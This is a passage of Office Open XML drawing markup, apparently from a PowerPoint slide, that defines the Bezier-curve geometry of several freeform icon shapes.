                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="40"/>
                  <a:pt x="28" y="38"/>
                  <a:pt x="30" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="32"/>
                  <a:pt x="27" y="32"/>
                  <a:pt x="27" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="34"/>
                  <a:pt x="22" y="36"/>
                  <a:pt x="19" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="36"/>
                  <a:pt x="13" y="34"/>
                  <a:pt x="11" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3" y="24"/>
                  <a:pt x="3" y="24"/>
                  <a:pt x="3" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="22"/>
                  <a:pt x="0" y="20"/>
                  <a:pt x="0" y="17"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14"/>
                  <a:pt x="1" y="11"/>
                  <a:pt x="3" y="9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="3"/>
                  <a:pt x="9" y="3"/>
                  <a:pt x="9" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11" y="1"/>
                  <a:pt x="14" y="0"/>
                  <a:pt x="17" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="0"/>
                  <a:pt x="22" y="1"/>
                  <a:pt x="24" y="4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="32" y="11"/>
                  <a:pt x="32" y="11"/>
                  <a:pt x="32" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="13"/>
                  <a:pt x="35" y="16"/>
                  <a:pt x="35" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="22"/>
                  <a:pt x="34" y="25"/>
                  <a:pt x="32" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="30"/>
                  <a:pt x="35" y="30"/>
                  <a:pt x="35" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="28"/>
                  <a:pt x="40" y="27"/>
                  <a:pt x="43" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="27"/>
                  <a:pt x="49" y="28"/>
                  <a:pt x="51" y="30"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="38"/>
                  <a:pt x="59" y="38"/>
                  <a:pt x="59" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="61" y="40"/>
                  <a:pt x="62" y="43"/>
                  <a:pt x="62" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="49"/>
                  <a:pt x="61" y="52"/>
                  <a:pt x="59" y="54"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="27" y="17"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="9"/>
                  <a:pt x="19" y="9"/>
                  <a:pt x="19" y="9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="8"/>
                  <a:pt x="18" y="8"/>
                  <a:pt x="17" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="8"/>
                  <a:pt x="15" y="8"/>
                  <a:pt x="14" y="9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5"/>
                  <a:pt x="7" y="16"/>
                  <a:pt x="7" y="17"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="18"/>
                  <a:pt x="8" y="19"/>
                  <a:pt x="8" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="27"/>
                  <a:pt x="16" y="27"/>
                  <a:pt x="16" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17" y="28"/>
                  <a:pt x="18" y="28"/>
                  <a:pt x="19" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="28"/>
                  <a:pt x="21" y="28"/>
                  <a:pt x="22" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="26"/>
                  <a:pt x="19" y="25"/>
                  <a:pt x="19" y="23"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="21"/>
                  <a:pt x="21" y="19"/>
                  <a:pt x="23" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="19"/>
                  <a:pt x="26" y="21"/>
                  <a:pt x="27" y="22"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="21"/>
                  <a:pt x="28" y="20"/>
                  <a:pt x="28" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28" y="18"/>
                  <a:pt x="28" y="17"/>
                  <a:pt x="27" y="17"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="54" y="43"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="35"/>
                  <a:pt x="46" y="35"/>
                  <a:pt x="46" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="45" y="35"/>
                  <a:pt x="44" y="34"/>
                  <a:pt x="43" y="34"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42" y="34"/>
                  <a:pt x="41" y="35"/>
                  <a:pt x="40" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42" y="37"/>
                  <a:pt x="43" y="38"/>
                  <a:pt x="43" y="40"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="42"/>
                  <a:pt x="42" y="43"/>
                  <a:pt x="40" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="43"/>
                  <a:pt x="37" y="42"/>
                  <a:pt x="35" y="41"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="41"/>
                  <a:pt x="34" y="42"/>
                  <a:pt x="34" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="44"/>
                  <a:pt x="34" y="45"/>
                  <a:pt x="35" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="54"/>
                  <a:pt x="43" y="54"/>
                  <a:pt x="43" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="55"/>
                  <a:pt x="45" y="55"/>
                  <a:pt x="45" y="55"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="55"/>
                  <a:pt x="47" y="55"/>
                  <a:pt x="48" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="48"/>
                  <a:pt x="54" y="48"/>
                  <a:pt x="54" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="48"/>
                  <a:pt x="55" y="47"/>
                  <a:pt x="55" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="55" y="45"/>
                  <a:pt x="54" y="44"/>
                  <a:pt x="54" y="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38" name="Freeform 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76FC3A62-5866-4CAA-AB32-214EDE59CFC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004629" y="5107951"/>
            <a:ext cx="263115" cy="292178"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 344062 w 224"/>
              <a:gd name="T1" fmla="*/ 214461 h 256"/>
              <a:gd name="T2" fmla="*/ 305111 w 224"/>
              <a:gd name="T3" fmla="*/ 214461 h 256"/>
              <a:gd name="T4" fmla="*/ 285636 w 224"/>
              <a:gd name="T5" fmla="*/ 194965 h 256"/>
              <a:gd name="T6" fmla="*/ 285636 w 224"/>
              <a:gd name="T7" fmla="*/ 116979 h 256"/>
              <a:gd name="T8" fmla="*/ 305111 w 224"/>
              <a:gd name="T9" fmla="*/ 97482 h 256"/>
              <a:gd name="T10" fmla="*/ 344062 w 224"/>
              <a:gd name="T11" fmla="*/ 97482 h 256"/>
              <a:gd name="T12" fmla="*/ 363537 w 224"/>
              <a:gd name="T13" fmla="*/ 116979 h 256"/>
              <a:gd name="T14" fmla="*/ 363537 w 224"/>
              <a:gd name="T15" fmla="*/ 194965 h 256"/>
              <a:gd name="T16" fmla="*/ 344062 w 224"/>
              <a:gd name="T17" fmla="*/ 214461 h 256"/>
              <a:gd name="T18" fmla="*/ 305111 w 224"/>
              <a:gd name="T19" fmla="*/ 19496 h 256"/>
              <a:gd name="T20" fmla="*/ 324587 w 224"/>
              <a:gd name="T21" fmla="*/ 0 h 256"/>
              <a:gd name="T22" fmla="*/ 344062 w 224"/>
              <a:gd name="T23" fmla="*/ 19496 h 256"/>
              <a:gd name="T24" fmla="*/ 344062 w 224"/>
              <a:gd name="T25" fmla="*/ 77986 h 256"/>
              <a:gd name="T26" fmla="*/ 305111 w 224"/>
              <a:gd name="T27" fmla="*/ 77986 h 256"/>
              <a:gd name="T28" fmla="*/ 305111 w 224"/>
              <a:gd name="T29" fmla="*/ 19496 h 256"/>
              <a:gd name="T30" fmla="*/ 201244 w 224"/>
              <a:gd name="T31" fmla="*/ 318443 h 256"/>
              <a:gd name="T32" fmla="*/ 162293 w 224"/>
              <a:gd name="T33" fmla="*/ 318443 h 256"/>
              <a:gd name="T34" fmla="*/ 142818 w 224"/>
              <a:gd name="T35" fmla="*/ 298946 h 256"/>
              <a:gd name="T36" fmla="*/ 142818 w 224"/>
              <a:gd name="T37" fmla="*/ 220960 h 256"/>
              <a:gd name="T38" fmla="*/ 162293 w 224"/>
              <a:gd name="T39" fmla="*/ 201464 h 256"/>
              <a:gd name="T40" fmla="*/ 201244 w 224"/>
              <a:gd name="T41" fmla="*/ 201464 h 256"/>
              <a:gd name="T42" fmla="*/ 220719 w 224"/>
              <a:gd name="T43" fmla="*/ 220960 h 256"/>
              <a:gd name="T44" fmla="*/ 220719 w 224"/>
              <a:gd name="T45" fmla="*/ 298946 h 256"/>
              <a:gd name="T46" fmla="*/ 201244 w 224"/>
              <a:gd name="T47" fmla="*/ 318443 h 256"/>
              <a:gd name="T48" fmla="*/ 162293 w 224"/>
              <a:gd name="T49" fmla="*/ 19496 h 256"/>
              <a:gd name="T50" fmla="*/ 181769 w 224"/>
              <a:gd name="T51" fmla="*/ 0 h 256"/>
              <a:gd name="T52" fmla="*/ 201244 w 224"/>
              <a:gd name="T53" fmla="*/ 19496 h 256"/>
              <a:gd name="T54" fmla="*/ 201244 w 224"/>
              <a:gd name="T55" fmla="*/ 181967 h 256"/>
              <a:gd name="T56" fmla="*/ 162293 w 224"/>
              <a:gd name="T57" fmla="*/ 181967 h 256"/>
              <a:gd name="T58" fmla="*/ 162293 w 224"/>
              <a:gd name="T59" fmla="*/ 19496 h 256"/>
              <a:gd name="T60" fmla="*/ 58426 w 224"/>
              <a:gd name="T61" fmla="*/ 266452 h 256"/>
              <a:gd name="T62" fmla="*/ 19475 w 224"/>
              <a:gd name="T63" fmla="*/ 266452 h 256"/>
              <a:gd name="T64" fmla="*/ 0 w 224"/>
              <a:gd name="T65" fmla="*/ 246955 h 256"/>
              <a:gd name="T66" fmla="*/ 0 w 224"/>
              <a:gd name="T67" fmla="*/ 168970 h 256"/>
              <a:gd name="T68" fmla="*/ 19475 w 224"/>
              <a:gd name="T69" fmla="*/ 149473 h 256"/>
              <a:gd name="T70" fmla="*/ 58426 w 224"/>
              <a:gd name="T71" fmla="*/ 149473 h 256"/>
              <a:gd name="T72" fmla="*/ 77901 w 224"/>
              <a:gd name="T73" fmla="*/ 168970 h 256"/>
              <a:gd name="T74" fmla="*/ 77901 w 224"/>
              <a:gd name="T75" fmla="*/ 246955 h 256"/>
              <a:gd name="T76" fmla="*/ 58426 w 224"/>
              <a:gd name="T77" fmla="*/ 266452 h 256"/>
              <a:gd name="T78" fmla="*/ 19475 w 224"/>
              <a:gd name="T79" fmla="*/ 19496 h 256"/>
              <a:gd name="T80" fmla="*/ 38950 w 224"/>
              <a:gd name="T81" fmla="*/ 0 h 256"/>
              <a:gd name="T82" fmla="*/ 58426 w 224"/>
              <a:gd name="T83" fmla="*/ 19496 h 256"/>
              <a:gd name="T84" fmla="*/ 58426 w 224"/>
              <a:gd name="T85" fmla="*/ 129977 h 256"/>
              <a:gd name="T86" fmla="*/ 19475 w 224"/>
              <a:gd name="T87" fmla="*/ 129977 h 256"/>
              <a:gd name="T88" fmla="*/ 19475 w 224"/>
              <a:gd name="T89" fmla="*/ 19496 h 256"/>
              <a:gd name="T90" fmla="*/ 58426 w 224"/>
              <a:gd name="T91" fmla="*/ 396429 h 256"/>
              <a:gd name="T92" fmla="*/ 38950 w 224"/>
              <a:gd name="T93" fmla="*/ 415925 h 256"/>
              <a:gd name="T94" fmla="*/ 19475 w 224"/>
              <a:gd name="T95" fmla="*/ 396429 h 256"/>
              <a:gd name="T96" fmla="*/ 19475 w 224"/>
              <a:gd name="T97" fmla="*/ 285948 h 256"/>
              <a:gd name="T98" fmla="*/ 58426 w 224"/>
              <a:gd name="T99" fmla="*/ 285948 h 256"/>
              <a:gd name="T100" fmla="*/ 58426 w 224"/>
              <a:gd name="T101" fmla="*/ 396429 h 256"/>
              <a:gd name="T102" fmla="*/ 201244 w 224"/>
              <a:gd name="T103" fmla="*/ 396429 h 256"/>
              <a:gd name="T104" fmla="*/ 181769 w 224"/>
              <a:gd name="T105" fmla="*/ 415925 h 256"/>
              <a:gd name="T106" fmla="*/ 162293 w 224"/>
              <a:gd name="T107" fmla="*/ 396429 h 256"/>
              <a:gd name="T108" fmla="*/ 162293 w 224"/>
              <a:gd name="T109" fmla="*/ 337939 h 256"/>
              <a:gd name="T110" fmla="*/ 201244 w 224"/>
              <a:gd name="T111" fmla="*/ 337939 h 256"/>
              <a:gd name="T112" fmla="*/ 201244 w 224"/>
              <a:gd name="T113" fmla="*/ 396429 h 256"/>
              <a:gd name="T114" fmla="*/ 344062 w 224"/>
              <a:gd name="T115" fmla="*/ 396429 h 256"/>
              <a:gd name="T116" fmla="*/ 324587 w 224"/>
              <a:gd name="T117" fmla="*/ 415925 h 256"/>
              <a:gd name="T118" fmla="*/ 305111 w 224"/>
              <a:gd name="T119" fmla="*/ 396429 h 256"/>
              <a:gd name="T120" fmla="*/ 305111 w 224"/>
              <a:gd name="T121" fmla="*/ 233958 h 256"/>
              <a:gd name="T122" fmla="*/ 344062 w 224"/>
              <a:gd name="T123" fmla="*/ 233958 h 256"/>
              <a:gd name="T124" fmla="*/ 344062 w 224"/>
              <a:gd name="T125" fmla="*/ 396429 h 25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224" h="256">
                <a:moveTo>
                  <a:pt x="212" y="132"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="188" y="132"/>
                  <a:pt x="188" y="132"/>
                  <a:pt x="188" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="181" y="132"/>
                  <a:pt x="176" y="127"/>
                  <a:pt x="176" y="120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5"/>
                  <a:pt x="181" y="60"/>
                  <a:pt x="188" y="60"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="60"/>
                  <a:pt x="212" y="60"/>
                  <a:pt x="212" y="60"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="60"/>
                  <a:pt x="224" y="65"/>
                  <a:pt x="224" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="224" y="120"/>
                  <a:pt x="224" y="120"/>
                  <a:pt x="224" y="120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="224" y="127"/>
                  <a:pt x="219" y="132"/>
                  <a:pt x="212" y="132"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="188" y="12"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="188" y="5"/>
                  <a:pt x="193" y="0"/>
                  <a:pt x="200" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="207" y="0"/>
                  <a:pt x="212" y="5"/>
                  <a:pt x="212" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="48"/>
                  <a:pt x="212" y="48"/>
                  <a:pt x="212" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="188" y="48"/>
                  <a:pt x="188" y="48"/>
                  <a:pt x="188" y="48"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="188" y="12"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="124" y="196"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="100" y="196"/>
                  <a:pt x="100" y="196"/>
                  <a:pt x="100" y="196"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93" y="196"/>
                  <a:pt x="88" y="191"/>
                  <a:pt x="88" y="184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29"/>
                  <a:pt x="93" y="124"/>
                  <a:pt x="100" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="124"/>
                  <a:pt x="124" y="124"/>
                  <a:pt x="124" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="131" y="124"/>
                  <a:pt x="136" y="129"/>
                  <a:pt x="136" y="136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136" y="184"/>
                  <a:pt x="136" y="184"/>
                  <a:pt x="136" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136" y="191"/>
                  <a:pt x="131" y="196"/>
                  <a:pt x="124" y="196"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="100" y="12"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="100" y="5"/>
                  <a:pt x="105" y="0"/>
                  <a:pt x="112" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="119" y="0"/>
                  <a:pt x="124" y="5"/>
                  <a:pt x="124" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="112"/>
                  <a:pt x="124" y="112"/>
                  <a:pt x="124" y="112"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="100" y="112"/>
                  <a:pt x="100" y="112"/>
                  <a:pt x="100" y="112"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="100" y="12"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="36" y="164"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="164"/>
                  <a:pt x="12" y="164"/>
                  <a:pt x="12" y="164"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="164"/>
                  <a:pt x="0" y="159"/>
                  <a:pt x="0" y="15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43" y="92"/>
                  <a:pt x="48" y="97"/>
                  <a:pt x="48" y="104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9"/>
                  <a:pt x="43" y="164"/>
                  <a:pt x="36" y="164"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12" y="12"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="5"/>
                  <a:pt x="17" y="0"/>
                  <a:pt x="24" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="31" y="0"/>
                  <a:pt x="36" y="5"/>
                  <a:pt x="36" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="80"/>
                  <a:pt x="36" y="80"/>
                  <a:pt x="36" y="80"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="80"/>
                  <a:pt x="12" y="80"/>
                  <a:pt x="12" y="80"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12" y="12"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="36" y="244"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="251"/>
                  <a:pt x="31" y="256"/>
                  <a:pt x="24" y="256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17" y="256"/>
                  <a:pt x="12" y="251"/>
                  <a:pt x="12" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="176"/>
                  <a:pt x="12" y="176"/>
                  <a:pt x="12" y="176"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="176"/>
                  <a:pt x="36" y="176"/>
                  <a:pt x="36" y="176"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="36" y="244"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="124" y="244"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="251"/>
                  <a:pt x="119" y="256"/>
                  <a:pt x="112" y="256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="256"/>
                  <a:pt x="100" y="251"/>
                  <a:pt x="100" y="244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24" y="208"/>
                  <a:pt x="124" y="208"/>
                  <a:pt x="124" y="208"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="124" y="244"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="212" y="244"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="251"/>
                  <a:pt x="207" y="256"/>
                  <a:pt x="200" y="256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="193" y="256"/>
                  <a:pt x="188" y="251"/>
                  <a:pt x="188" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="188" y="144"/>
                  <a:pt x="188" y="144"/>
                  <a:pt x="188" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="144"/>
                  <a:pt x="212" y="144"/>
                  <a:pt x="212" y="144"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="212" y="2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39" name="Freeform 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16BA3908-3FDE-4934-B0A7-688E8FC5006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876698" y="3537458"/>
            <a:ext cx="274602" cy="252138"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 274070 w 232"/>
              <a:gd name="T1" fmla="*/ 130284 h 232"/>
              <a:gd name="T2" fmla="*/ 324343 w 232"/>
              <a:gd name="T3" fmla="*/ 149827 h 232"/>
              <a:gd name="T4" fmla="*/ 227040 w 232"/>
              <a:gd name="T5" fmla="*/ 169370 h 232"/>
              <a:gd name="T6" fmla="*/ 207580 w 232"/>
              <a:gd name="T7" fmla="*/ 71656 h 232"/>
              <a:gd name="T8" fmla="*/ 246501 w 232"/>
              <a:gd name="T9" fmla="*/ 71656 h 232"/>
              <a:gd name="T10" fmla="*/ 343804 w 232"/>
              <a:gd name="T11" fmla="*/ 4886 h 232"/>
              <a:gd name="T12" fmla="*/ 356777 w 232"/>
              <a:gd name="T13" fmla="*/ 0 h 232"/>
              <a:gd name="T14" fmla="*/ 371373 w 232"/>
              <a:gd name="T15" fmla="*/ 32571 h 232"/>
              <a:gd name="T16" fmla="*/ 304883 w 232"/>
              <a:gd name="T17" fmla="*/ 208455 h 232"/>
              <a:gd name="T18" fmla="*/ 304883 w 232"/>
              <a:gd name="T19" fmla="*/ 247541 h 232"/>
              <a:gd name="T20" fmla="*/ 371373 w 232"/>
              <a:gd name="T21" fmla="*/ 345254 h 232"/>
              <a:gd name="T22" fmla="*/ 376238 w 232"/>
              <a:gd name="T23" fmla="*/ 358282 h 232"/>
              <a:gd name="T24" fmla="*/ 343804 w 232"/>
              <a:gd name="T25" fmla="*/ 372939 h 232"/>
              <a:gd name="T26" fmla="*/ 246501 w 232"/>
              <a:gd name="T27" fmla="*/ 275226 h 232"/>
              <a:gd name="T28" fmla="*/ 227040 w 232"/>
              <a:gd name="T29" fmla="*/ 325711 h 232"/>
              <a:gd name="T30" fmla="*/ 207580 w 232"/>
              <a:gd name="T31" fmla="*/ 227998 h 232"/>
              <a:gd name="T32" fmla="*/ 149198 w 232"/>
              <a:gd name="T33" fmla="*/ 325711 h 232"/>
              <a:gd name="T34" fmla="*/ 129737 w 232"/>
              <a:gd name="T35" fmla="*/ 275226 h 232"/>
              <a:gd name="T36" fmla="*/ 32434 w 232"/>
              <a:gd name="T37" fmla="*/ 372939 h 232"/>
              <a:gd name="T38" fmla="*/ 0 w 232"/>
              <a:gd name="T39" fmla="*/ 358282 h 232"/>
              <a:gd name="T40" fmla="*/ 4865 w 232"/>
              <a:gd name="T41" fmla="*/ 345254 h 232"/>
              <a:gd name="T42" fmla="*/ 71355 w 232"/>
              <a:gd name="T43" fmla="*/ 247541 h 232"/>
              <a:gd name="T44" fmla="*/ 71355 w 232"/>
              <a:gd name="T45" fmla="*/ 208455 h 232"/>
              <a:gd name="T46" fmla="*/ 168658 w 232"/>
              <a:gd name="T47" fmla="*/ 227998 h 232"/>
              <a:gd name="T48" fmla="*/ 149198 w 232"/>
              <a:gd name="T49" fmla="*/ 325711 h 232"/>
              <a:gd name="T50" fmla="*/ 71355 w 232"/>
              <a:gd name="T51" fmla="*/ 169370 h 232"/>
              <a:gd name="T52" fmla="*/ 71355 w 232"/>
              <a:gd name="T53" fmla="*/ 130284 h 232"/>
              <a:gd name="T54" fmla="*/ 4865 w 232"/>
              <a:gd name="T55" fmla="*/ 32571 h 232"/>
              <a:gd name="T56" fmla="*/ 0 w 232"/>
              <a:gd name="T57" fmla="*/ 19543 h 232"/>
              <a:gd name="T58" fmla="*/ 32434 w 232"/>
              <a:gd name="T59" fmla="*/ 4886 h 232"/>
              <a:gd name="T60" fmla="*/ 129737 w 232"/>
              <a:gd name="T61" fmla="*/ 102599 h 232"/>
              <a:gd name="T62" fmla="*/ 149198 w 232"/>
              <a:gd name="T63" fmla="*/ 52114 h 232"/>
              <a:gd name="T64" fmla="*/ 168658 w 232"/>
              <a:gd name="T65" fmla="*/ 149827 h 23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232" h="232">
                <a:moveTo>
                  <a:pt x="229" y="20"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="80"/>
                  <a:pt x="169" y="80"/>
                  <a:pt x="169" y="80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5" y="80"/>
                  <a:pt x="200" y="85"/>
                  <a:pt x="200" y="92"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="200" y="99"/>
                  <a:pt x="195" y="104"/>
                  <a:pt x="188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37"/>
                  <a:pt x="133" y="32"/>
                  <a:pt x="140" y="32"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="147" y="32"/>
                  <a:pt x="152" y="37"/>
                  <a:pt x="152" y="44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212" y="3"/>
                  <a:pt x="212" y="3"/>
                  <a:pt x="212" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="3"/>
                  <a:pt x="212" y="3"/>
                  <a:pt x="212" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="214" y="1"/>
                  <a:pt x="217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5"/>
                  <a:pt x="231" y="18"/>
                  <a:pt x="229" y="20"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="140" y="128"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="188" y="128"/>
                  <a:pt x="188" y="128"/>
                  <a:pt x="188" y="128"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="128"/>
                  <a:pt x="200" y="133"/>
                  <a:pt x="200" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="200" y="147"/>
                  <a:pt x="195" y="152"/>
                  <a:pt x="188" y="152"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="169" y="152"/>
                  <a:pt x="169" y="152"/>
                  <a:pt x="169" y="15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31" y="214"/>
                  <a:pt x="232" y="217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cubicBezTo>
                  <a:pt x="217" y="232"/>
                  <a:pt x="214" y="231"/>
                  <a:pt x="212" y="229"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="229"/>
                  <a:pt x="212" y="229"/>
                  <a:pt x="212" y="229"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="152" y="169"/>
                  <a:pt x="152" y="169"/>
                  <a:pt x="152" y="169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52" y="195"/>
                  <a:pt x="147" y="200"/>
                  <a:pt x="140" y="200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="200"/>
                  <a:pt x="128" y="195"/>
                  <a:pt x="128" y="188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moveTo>
                  <a:pt x="92" y="200"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="85" y="200"/>
                  <a:pt x="80" y="195"/>
                  <a:pt x="80" y="188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20" y="229"/>
                  <a:pt x="20" y="229"/>
                  <a:pt x="20" y="229"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="229"/>
                  <a:pt x="20" y="229"/>
                  <a:pt x="20" y="229"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18" y="231"/>
                  <a:pt x="15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217"/>
                  <a:pt x="1" y="214"/>
                  <a:pt x="3" y="212"/>
